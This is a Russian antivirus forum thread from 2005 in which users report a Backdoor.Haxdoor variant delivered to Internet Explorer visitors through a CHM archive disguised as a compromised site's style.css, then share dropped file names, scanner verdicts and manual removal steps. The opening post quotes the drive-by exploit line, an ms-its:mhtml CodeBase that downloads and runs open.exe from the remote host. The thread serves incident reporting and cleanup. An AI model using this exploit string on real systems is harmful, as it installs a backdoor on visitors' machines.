Страница 1 из 3 123 Последняя
Показано с 1 по 20 из 46.

BackDoor.Haxdoor устанавливается при просмотре сайтов

  1. #1
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    12.10.2004
    Адрес
    Смоленск
    Сообщений
    6,179
    Вес репутации
    3380

    BackDoor.Haxdoor устанавливается при просмотре сайтов

    Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
    хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
    причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
    CodeBase: ms-its:mhtml:file://d:\foo.mht!http://techlabs.ru/forum/templates/s...css::/open.exe
    CLSID: {11111111-1111-1111-1111-222222222222}

    Данная информация передана в лабораторию Касперского и другим вирусологам, но позволяет пролить свет на типовую методику внедрения данного зверя на компьютеры пользователей. Пользователь, которого занесло на указанный ресурс, работал под XP SP1 с включенным Firewall - и это его естественно не спасло. В ходе лечения на ПК изловлен типовой набор файлов, в частности:
    open.exe - это инсталлятор "зверя", размер 44177 байт
    wd.sys - 4096 байт
    vdnt32.sys - 14832 байт
    memlow.sys - 4096 байт
    hm.sys - 14832 байт
    draw32.dll - 33568 байт
    cm.dll - 33568 байт
    Как и известные разновидности, данная применяет руткит-механизмы, основанные на перехвате функций в User и Kernel режиме.
    Администрации сайта techlabs.ru я отписал письмо с описанием того, что их сайт применяется как источник зверя ....

  2. Реклама
     

  3. #2
    Full Member Репутация Репутация
    Регистрация
    29.09.2004
    Сообщений
    182
    Вес репутации
    47

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    [quote author=Зайцев Олег link=board=4;threadid=1103;start=0#msg10446 date=1113370404]
    Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
    хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
    причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
    CodeBase: ms-its:mhtml:file://d:\foo.mht!http://techlabs.ru/forum/templates/s...css::/open.exe
    CLSID: {11111111-1111-1111-1111-222222222222}
    ...
    [/quote]
    А можно пояснить, как происходит заражение? В некотором htm есть ссылка на style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?

  4. #3
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    12.10.2004
    Адрес
    Смоленск
    Сообщений
    6,179
    Вес репутации
    3380

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    Цитата Сообщение от userr
    А можно пояснить, как происходит заражение? В некотором htm есть ссылка на style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?
    Да, примерно так ... вообще методик известно великое множество, наиболее распространенные относятся к категории Exploit.HTML.mht - в теле страницы встречается характерный код типа ... <object data="ms-its:mhtml:file: ... - при его исполнении происходит загрузка и выполнение вредоносного кода. В данном случае применена именно такая технология в типовой реализации - когда "зверь" хранится в CHM файле, причем имя и расширение файла не играют особого значения. Есть и другие варианты - с применением апплетов, JPEG картинок с модифицированным заголовком ...
    Причем что интересно - я утром отправил создателям сайта techlabs.ru письмо с описанием ситуации - между тем вредоносный файл по прежнему на месте.

  5. #4
    Geser
    Guest

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    Может они так зарабатывают

  6. #5
    Full Member Репутация
    Регистрация
    16.10.2004
    Сообщений
    96
    Вес репутации
    45

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    Это только на IE работает?

  7. #6
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Shu_b
    Регистрация
    02.11.2004
    Сообщений
    3,553
    Вес репутации
    1636

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    Ради интереса переодически кидаю его на вирусскан...

    на 15-16 msk:
    NOD32 ***Found probably unknown NewHeur_PE (probable variant)
    VBA32 ***Found Trojan.LdPinch.4 (probable variant)

    на 19:45 msk:
    Dr.Web ***Found Trojan.PWS.LDPinch.394
    NOD32 ***Found probably unknown NewHeur_PE (probable variant)
    VBA32 ***Found Trojan.LdPinch.4 (probable variant)

  8. #7
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    12.10.2004
    Адрес
    Смоленск
    Сообщений
    6,179
    Вес репутации
    3380

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    [quote author=Участковый link=board=4;threadid=1103;start=0#msg10516 date=1113402436]
    Это только на IE работает?
    [/quote]
    Судя пл всему да. Я не проверял на других браузерах, но подобные эксплоиты характерны в основном для IE.

    Posted by: shu_b
    Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере

  9. #8
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Shu_b
    Регистрация
    02.11.2004
    Сообщений
    3,553
    Вес репутации
    1636

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    на 14.04.05 22:20 msk

    Dr.Web ***Found Trojan.PWS.LDPinch.394
    Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta
    NOD32 ***Found probably unknown NewHeur_PE (probable variant)
    VBA32 ***Found Trojan.LdPinch.4 (probable variant)

  10. #9
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    12.10.2004
    Адрес
    Смоленск
    Сообщений
    6,179
    Вес репутации
    3380

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    Цитата Сообщение от shu_b
    на 14.04.05 22:20 msk

    Dr.Web ***Found Trojan.PWS.LDPinch.394
    Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta
    NOD32 ***Found probably unknown NewHeur_PE (probable variant)
    VBA32 ***Found Trojan.LdPinch.4 (probable variant)
    Сегодня вечером я получил ответ от ЛК - все компоненты "зверя" классифицировали как и предполагалось - Backdoor.Haxdoor.cr. От создателей сайта http://techlabs.ru ответ так и не пришел, но сегодня я качнул файлик style.css- уже "Ошибка 404"... - файл вроде как убрали

  11. #10
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Shu_b
    Регистрация
    02.11.2004
    Сообщений
    3,553
    Вес репутации
    1636

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    Последний раз на 15.04.05 20:00 msk:

    BitDefender ***Found BehavesLike:Trojan.FirewallBypass (probable variant)
    Dr.Web Found Trojan.PWS.LDPinch.394
    Kaspersky Anti-Virus Found Trojan-Dropper.Win32.Small.ta
    NOD32 Found probably unknown NewHeur_PE (probable variant)
    VBA32 Found Trojan.LdPinch.4 (probable variant)

  12. #11
    VBA Репутация
    Регистрация
    29.09.2004
    Сообщений
    96
    Вес репутации
    45

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    [quote author=Зайцев Олег link=board=4;threadid=1103;start=0#msg10523 date=1113408675]
    Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере
    [/quote]
    Наверное нашему эвристику поверили ;D

  13. #12
    Visiting Helper Репутация
    Регистрация
    03.10.2004
    Сообщений
    699
    Вес репутации
    49

    Re:BackDoor.Haxdoor устанавливается при просмотре сайтов

    хотя он и ошибся.... это ведь не пинчь... тогдаб уж назвали PSW-Trojan

  14. #13
    gara77
    Guest
    хочу с вами познакомиться...

  15. #14
    Geser
    Guest
    Со всеми сразу, или по очереди?

  16. #15
    Visiting Helper Репутация
    Регистрация
    03.10.2004
    Сообщений
    699
    Вес репутации
    49
    )))
    Всего один дурной бит - и гигабайты лежат в маразме.
    Скажи мне свою OS и я скажу тебе КТО ты.

  17. #16
    Гость
    Guest

    про Haxdoor

    >[QUOTE=Зайцев Олег]Сегодня на одном из ПК я изловил свежайшую >разновидность Backdoor.Haxdoor.

    Это уже не свежая разновидность
    хотя алгоритм тот же
    Поймал у себя Haxdoor.cn версию этой заразы AVP не мог убить
    файлы убиватьв Safe mode:

    mszx32.exe - наверное теперь вместо open.exe

    - cz.dll
    - drct16.dll
    - hz.sys
    - vdmt16.sys
    - winlow.sys
    - wz.sys

    лежит вся прелесть в system32
    Кстати после изоляции вышеперечисленных файлов из родной папочки
    каспер их стал видеть.

    ну и в реестре ищите ссылки на winlow; vdmt16 и drct16

    файлы перечисленные Олегом нифига не найдены, зато есть ключики в реестре (маскировка???) которые выносятся очень легко и просто.
    Зато с ключами про winlow; vdmt16 придется попотеть.

    Если создатель сего творения это прочитает, то пусть знает ОН ГАД КАКИХ МАЛО!!!!

  18. #17
    Dr. Zorg
    Guest

    Angry Backdoor

    А я то думал, шо опять комп бочит! Ведь тока систему переустановил! Сначала я воевал с Bloodhound.w32.ep, теперь Нортон обновив, напоролся на Backdoor.Haxdoor. Полный идиотизм - я что, приманка для троянов?!! Короче - кончайте все вирусы, беспощадно!

  19. #18
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для pig
    Регистрация
    17.09.2004
    Адрес
    Апатиты, Мурманская область, Россия
    Сообщений
    10,629
    Вес репутации
    1288
    Спасибо за ценное описание (Гостю отдельно). Очень помогло.

  20. #19
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для HATTIFNATTOR
    Регистрация
    14.11.2004
    Адрес
    Russia
    Сообщений
    1,391
    Вес репутации
    206
    Перемещено в "Помогите" -
    http://www.virusinfo.info/showthread.php?t=3281

  21. #20
    Antivirus_KZ
    Guest
    Седня клиенты жаловались что у них в системе вирусня
    Симантек 10.0 молчит как партизан (обновление 09.11.05)
    Просканил систему с помощью AVZ 4.1

    Лог скана не сохранил к сожалению....
    Но AVZ сразу начал ругатся типа
    обнаружена маскировка процесса explorer.exe и winlogon.exe
    посморел через диспетчер процессов какие библиотеки использует
    увидев такие подозрительные как
    tcpQ32.dll - не есть гууд.
    Заодно она прписалась в HKLM_SOFTWARE_Micrososft_WINNT_Winlogon
    и оттудова никак не убирается....в Safe Mode тоже самое
    Пришлось грузится с ERD и ручками рубить на корню в реестре
    а заодно в System32...
    После этого загрузился нормально и запустил скан Симантека
    Мля скокоже он гадости надыбал
    Backdoor.haxdor.E
    Вопрос почему до этого молчал?? Ведь же вирус не такой новый..
    Приходилось сталкиватся, до этого Backdoor.haxdor.C

Страница 1 из 3 123 Последняя

Похожие темы

  1. Словил баннер при просмотре сайтов
    От Dark_KRONOS в разделе Помогите!
    Ответов: 3
    Последнее сообщение: 30.03.2012, 18:19
  2. Backdoor.Haxdoor
    От Flash в разделе Помогите!
    Ответов: 11
    Последнее сообщение: 22.02.2009, 05:30
  3. Backdoor.Haxdoor (avz и прочее)
    От filprint в разделе Помогите!
    Ответов: 16
    Последнее сообщение: 22.02.2009, 05:02
  4. Backdoor.Win32.Haxdoor.kz
    От XPOHAPUYC в разделе Помогите!
    Ответов: 8
    Последнее сообщение: 22.02.2009, 04:42
  5. AVZ и Backdoor.Haxdoor.D
    От в разделе Антивирусы
    Ответов: 4
    Последнее сообщение: 25.03.2005, 18:12

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01003 seconds with 25 queries